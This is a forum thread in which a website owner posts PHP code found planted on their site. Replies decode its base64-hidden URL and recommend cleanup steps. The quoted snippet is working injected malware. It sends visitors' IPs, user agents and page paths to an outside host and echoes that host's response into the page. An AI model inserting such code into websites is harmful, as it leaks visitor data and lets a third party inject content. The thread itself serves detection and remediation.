Unkown possible malicious code

nayen · December 2, 2012, 7:28am

Hi,

I checked one of my websites recently and I found the following code and I have no idea how it was placed there and what it does. If you have an idea what it does, could you please tell me.

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

Frenz48 · December 2, 2012, 8:33am

It sends statistics to http://browserglobalstat.com/statD/stat.php
The url got from the base64 decode.

cheesedude · December 2, 2012, 1:09pm

Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or Javascript, that is a sign that something is not right. Legitimate coders don’t try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similar to what happened to you. How access was gained to your account is anyone’s guess.

Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.

nayen · December 2, 2012, 3:10pm

Thanks for the info.

cheesedude:

Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or Javascript, that is a sign that something is not right. Legitimate coders don’t try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similar to what happened to you. How access was gained to your account is anyone’s guess.

Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.

Thanks a lot for the suggestions. I have no idea how this code was inserted there but whether it was done manually or by a script, it was inserted at a wrong place so that the page gave an error. That’s how I spotted it.